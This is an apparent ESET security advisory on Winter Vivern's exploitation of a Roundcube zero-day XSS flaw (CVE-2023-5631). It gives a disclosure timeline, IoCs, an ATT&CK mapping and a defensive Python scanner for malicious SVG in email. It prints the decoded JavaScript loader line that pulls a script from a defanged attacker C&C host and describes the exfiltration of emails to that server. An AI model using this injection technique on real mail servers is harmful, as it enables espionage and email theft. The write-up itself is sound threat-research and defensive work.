Winter Vivern exploits zero-day vulnerability in Roundcube webmail servers

esteria.white

ESET Research

ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible.


ESET Research has been closely tracking Winter Vivern’s cyberespionage operations for over a year, and during our routine monitoring we discovered that on October 11th, 2023 the group had begun exploiting a zero-day XSS vulnerability in the Roundcube Webmail server. This is a different vulnerability from CVE-2020-35730, which was also exploited by the group according to our research.

According to ESET telemetry data, the campaign targeted Roundcube Webmail servers owned by government entities and a think tank, all located in Europe.

Vulnerability disclosure timeline:

  • 2023-10-12: ESET Research reported the vulnerability to the Roundcube team.
  • 2023-10-14: The Roundcube team responded and acknowledged the vulnerability.
  • 2023-10-14: The Roundcube team fixed the vulnerability.
  • 2023-10-16: The Roundcube team released security updates fixing the vulnerability (1.6.4, 1.5.5 and 1.4.15).
  • 2023-10-18: ESET CNA issued a CVE for the vulnerability (CVE-2023-5631).
  • 2023-10-25: ESET Research blog article published.

We would like to thank the Roundcube developers for their quick response and for fixing the vulnerability in such a short time.

Winter Vivern profile

Winter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It is believed to have been active since at least 2020 and targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor (see the articles from the State Cyber Protection Centre of Ukraine and SentinelLabs). We believe with low confidence that Winter Vivern is related to MoustachedBouncer, a sophisticated Belarus-aligned group that we first published about in August 2023.

Winter Vivern has been targeting Zimbra and Roundcube email servers owned by government entities since at least 2022 – see this article from Proofpoint. In particular, we observed that the group exploited CVE-2020-35730, another XSS vulnerability in Roundcube, in August and September 2023. Note that Sednit (also known as APT28) also exploits this old XSS vulnerability in Roundcube, sometimes against the same targets.

Technical details

Exploitation of the XSS vulnerability, assigned CVE-2023-5631, can be done remotely by sending a specially crafted email message. In this Winter Vivern campaign, emails were sent from team.managment@outlook(.)com and had the subject Start in your Outlook, as shown in Figure 1.

Figure 1. Malicious email message

At first glance, the email does not appear malicious, but looking at the HTML source code, shown in Figure 2, we can see an SVG tag at the end, which contains a base64-encoded payload.

Figure 2. Email message containing a malicious SVG tag

Once we decode the base64-encoded value in the href attribute of the use tag, we have:

As the x value of the href attribute is not a valid URL, the onerror attribute of this object will be triggered. Decoding the payload in the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the victim’s browser as part of their Roundcube session:

var fe=document.createElement('script');fe.src="https://recsecas(.)com/controlserver/checkupdate.js";document.body.appendChild(fe);

Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out to be a zero-day XSS vulnerability in the server-side script rcube_washtml.php, which did not properly sanitize the malicious SVG document before it was added to the HTML page rendered for the Roundcube user. We reported it to Roundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5 and 1.4.x before 1.4.15.

In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.
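As an added example (not ESET’s or Roundcube’s code, and not the captured payload), the following Python script shows how a mail gateway or incident responder could flag the delivery pattern described above: an SVG element whose href is a base64 data: URI, whose decoded body carries an element with an event-handler attribute. It uses only the standard library. The sample message embedded in it is constructed for this example, with a harmless console.log in place of the real handler; the function and variable names are the example’s own.

```python
"""Scan email HTML for SVG content that smuggles markup through base64 data: URIs.

Added example, not ESET's or Roundcube's code. It looks for the structure the
write-up describes (an <svg> whose <use> href is a data: URI, whose decoded body
carries an element with an on* event-handler attribute) and recurses into
nested data: URIs up to a fixed depth.
"""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import unquote

DATA_URI_RE = re.compile(r"^\s*data:([^,]*),(.*)$", re.S | re.I)


def decode_data_uri(value):
    """Return the decoded body of a data: URI as text, or None if value is not one."""
    m = DATA_URI_RE.match(value)
    if not m:
        return None
    header, payload = m.group(1), m.group(2)
    if "base64" in header.lower():
        payload = re.sub(r"\s+", "", payload)
        try:
            raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
        except (binascii.Error, ValueError):
            return None
        return raw.decode("utf-8", "replace")
    return unquote(payload)


class SvgCollector(HTMLParser):
    """Collects event-handler attributes, <script> tags and href values inside <svg>."""

    def __init__(self):
        super().__init__()
        self.svg_depth = 0
        self.handlers = []  # (tag, attribute name, value)
        self.scripts = []   # tag names
        self.hrefs = []     # (tag, href value) seen inside an <svg>

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        if tag == "script":
            self.scripts.append(tag)
        for name, value in attrs:  # HTMLParser lowercases attribute names
            if name.startswith("on"):
                self.handlers.append((tag, name, value or ""))
            elif name in ("href", "xlink:href") and value and self.svg_depth:
                self.hrefs.append((tag, value))

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1


def scan_html(markup, depth=0, max_depth=3):
    """Return findings as (depth, kind, detail) tuples, recursing into data: hrefs."""
    findings = []
    parser = SvgCollector()
    parser.feed(markup)
    parser.close()
    for tag, name, value in parser.handlers:
        findings.append((depth, "event-handler", f"<{tag} {name}=...> {value[:60]}"))
    for tag in parser.scripts:
        findings.append((depth, "script-element", f"<{tag}>"))
    for tag, value in parser.hrefs:
        decoded = decode_data_uri(value)
        if decoded is None:
            continue  # ordinary URL or fragment reference, nothing to unwrap
        findings.append((depth, "data-uri-href", f"<{tag} href=data:...> {len(decoded)} decoded chars"))
        if depth < max_depth:  # bound recursion on deliberately nested payloads
            findings.extend(scan_html(decoded, depth + 1, max_depth))
    return findings


def is_suspicious(findings):
    """True if any level of the message carries an event handler or a script element."""
    return any(kind in ("event-handler", "script-element") for _, kind, _ in findings)


# Constructed sample modelled on the structure in the write-up; the inner
# handler is a harmless console.log, not the real payload.
INNER_SVG = ('<svg xmlns="http://www.w3.org/2000/svg">'
             '<image href="x" onerror="console.log(\'constructed sample\')"/></svg>')
_B64 = base64.b64encode(INNER_SVG.encode()).decode()
SAMPLE_EMAIL_HTML = (
    "<html><body><p>Please review the attached update notes.</p>"
    f'<svg><use href="data:image/svg+xml;base64,{_B64}"/></svg>'
    "</body></html>"
)
BENIGN_EMAIL_HTML = "<html><body><p>Hello</p><img src='cid:logo'></body></html>"

if __name__ == "__main__":
    results = scan_html(SAMPLE_EMAIL_HTML)
    for depth, kind, detail in results:
        print(f"{'  ' * depth}[{kind}] {detail}")
    print("suspicious:", is_suspicious(results))
```

Run directly, it prints the findings tree for the constructed message (a data: href at depth 0 and an event handler at depth 1) and a verdict of suspicious. In a gateway you would feed each incoming text/html MIME part to scan_html and quarantine on is_suspicious; the depth bound keeps nested data: URIs from turning into an unbounded unwrapping loop.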

The second stage is a simple JavaScript loader named checkupdate.js, shown in Figure 3.

Figure 3. JavaScript Loader

The final JavaScript payload – displayed in Figure 4 – is able to list folders and emails from the current Roundcube account, and exfiltrate emails to the C&C server by making HTTP requests to https://recsecas(.)com/controlserver/saveMessage.

Figure 4. Final JavaScript payload exfiltrating emails from Roundcube account (portion of obfuscated script removed for clarity)

Conclusion

Winter Vivern has scaled up its operations using a zero-day vulnerability in Roundcube. Previously, it used known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.

Despite the low sophistication of the group’s toolset, it poses a threat to European governments because of its persistence, its very regular phishing campaigns, and the fact that a significant number of internet-facing applications are not regularly updated even though they are known to contain vulnerabilities.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

SHA-1 | File name | Detection | Description
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 | checkupdate.js | JS/WinterVivern.B | JavaScript loader.
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 | N/A | JS/Kryptik.BIK | JavaScript payload exfiltrating emails from Roundcube.

Network

IP | Domain | Hosting provider | First seen | Details
38.180.76(.)31 | recsecas(.)com | M247 Europe SRL | 2023-09-28 | Winter Vivern C&C server

Email addresses

team.managment@outlook(.)com

This table was built using version 13 of the MITRE ATT&CK framework.

Tactic | ID | Name | Description
Resource Development | T1583.001 | Acquire Infrastructure: Domains | Winter Vivern operators purchased a domain at Registrar.eu.
Resource Development | T1583.004 | Acquire Infrastructure: Server | Winter Vivern operators rented a server at M247.
Resource Development | T1587.004 | Develop Capabilities: Exploits | Winter Vivern operators likely developed an exploit for Roundcube.
Initial Access | T1190 | Exploit Public-Facing Application | Winter Vivern sent an email exploiting CVE-2023-5631 in Roundcube.
Initial Access | T1566 | Phishing | The vulnerability is triggered via a phishing email, which the victim must open in the Roundcube webmail.
Execution | T1203 | Exploitation for Client Execution | The JavaScript payload is executed via an XSS vulnerability in Roundcube.
Discovery | T1087.003 | Account Discovery: Email Account | The JavaScript payload can list the folders of the email account.
Collection | T1114.002 | Email Collection: Remote Email Collection | The JavaScript payload can exfiltrate emails from the Roundcube account.
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | C&C communications use HTTP.
Exfiltration | T1041 | Exfiltration Over C2 Channel | Exfiltration is done via HTTP to the same C&C server.
